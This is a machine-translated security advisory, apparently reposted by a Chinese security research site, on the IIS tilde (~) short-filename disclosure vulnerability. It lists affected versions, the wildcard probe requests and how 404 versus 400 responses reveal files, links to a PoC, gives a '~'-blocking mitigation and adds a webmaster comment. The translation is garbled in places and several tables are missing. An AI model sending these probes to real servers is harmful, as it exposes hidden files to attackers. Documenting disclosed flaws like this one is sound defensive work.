IIS short file and folder leakage Vulnerability (Chinese translation version)

 
This article is translated from NLP.
 
IIS is a web server application created by Microsoft using the Microsoft windows function extension module. It is the third most popular server in the world.
 
Vulnerability description:
 
The vulnerability team discovered a Microsoft IIS vulnerability. Attackers can exploit this vulnerability to include "~ "To expose files and folders on the server,
 
Affected Versions:
 
IIS 1.0, Windows NT 3.51
 
IIS 2.0, Windows NT 4.0
 
IIS 3.0, Windows NT 4.0 Service Pack 2
 
IIS 4.0, Windows NT 4.0 Option Pack
 
IIS 5.0, Windows 2000
 
IIS 5.1, Windows XP Professional and Windows XP Media Center Edition
 
IIS 6.0, Windows Server 2003 and Windows XP Professional x64 Edition
 
IIS 7.0, Windows Server 2008, and Windows Vista
 
IIS 7.5 and Windows 7 (when an error is enabled remotely or the web. config configuration file is not available)
 
IIS 7.5, Windows 2008 (Classic managed pipeline Mode)
 
Vulnerability analysis and utilization:
 
If the website is running on the IIS server, you can use "~ "To find some files and folders, attackers can find important files or folders, if these files or folders are formal visible files.
 
For in-depth analysis of this vulnerability, refer to the following connection articles:
 
Http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/
 
Vulnerability details:
 
I have been searching for a method. If I can use wildcards "*" and "? "Sending a request to iis, I realized that when IIS receives a file path that contains "~ "The response to a request is different. based on this feature, we can distinguish an available or unavailable File Based on the http response. in the following table, the file validxxx. xxx exists in the root directory of the website server. (Note: xxx. xxx indicates that you are uncertain and still need to guess ). the main difference is that different versions of IIS return an error based on the request returned to determine whether a file exists.
 
 
 
For example, if an IIS6 website http://www.xxx.com's short file guessing method
 
Request http://www.bkjia.com/*~ 1 */. aspx returns 404, indicating that an axxx. xxx file starting with a exists. (xxx. xxx also needs to determine the letter and suffix ).
 
Request http://www.xxx.com/a *~ 1 */. aspx returns 400, indicating that there is no axxx. xxx file starting with a. (xxx. xxx also needs to determine which letter and suffix it is ).
 
The IIS5.X judgment method is as follows:
 
Request/*~ 1 * If 404 is returned, it indicates that a file starting with a exists.
 
Request/*~ 1 * the error 400 indicates that a file starting with a does not exist.
 
The IIS7.x.net 2 no error handing judgment method is as follows.
 
 
 
The entire process of an IIS6 guess file is attached below.
 
Test address: http://sdl.me/AcSecret.html acsecret.html is stored on the server. The process of guessing is as follows:
 
 
 
A detailed poc and vulnerability exploitation document is attached:
 
PoC: http://www.exploit-db.com/sploits/19525.zip
 
Paper: http://www.exploit-db.com/download_pdf/19527
 
Vulnerability repair solution:
 
Use solutions provided by Microsoft or security vendors
 
Use the configured Web application protection system (refuse to discard inclusion "~ Web requests may prevent this vulnerability.
 
Vulnerability discoverer:
 
Soroush Dalili (@ irsdl)
 
Ali Abbasnejad
 
Vulnerability reference:
 
Http://support.microsoft.com/kb/142982/en-us
 
Http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/
 

Webmaster comment:
 
In fact, this is a rare "Vulnerability "......
 
First, if the file name complies with the 8.3 standard (the object name subject is smaller than or equal to 8 bytes, And the extension is smaller than or equal to 3 bytes), there is no short file name.
 
Second, the question of Chinese characters, special characters, and other characters is also a headache ......
 
Finally, even if you guess it, there are only the first six. You can only try it with luck ......
 
However, it is still of no small use. It is also an alternative "vulnerability ......
 
(Note: If the target site customizes the 400 and 404 error pages, the scanner will not be able to determine ......)
 
See the following table:
 
2012/07/04 20:46 <DIR>! @#! @#~ 1. TXT! @#! @#! @ Brief .txt
2012/07/04 20:46 <DIR>! @#! @ Brief .txt
<DIR> 012345 ~ 1 0123456789
2012/07/04 20:44 <DIR> 1
<DIR> 123
<DIR> 123456
<DIR> 1234567
2012/07/04 20:44 <DIR> 12345678
<DIR> 123456 ~ 1 123456789
<DIR> ah. txt
<DIR> ah ~ 1. TXT.
012345 ~ 1. TXT 0123456789.txt
1.txt
29 123.txt
29 123456.txt
29 1234567.txt
29 12345678.txt
123456 ~ 1. TXT 123456789.txt

From nuclear'atk Network Security Research Center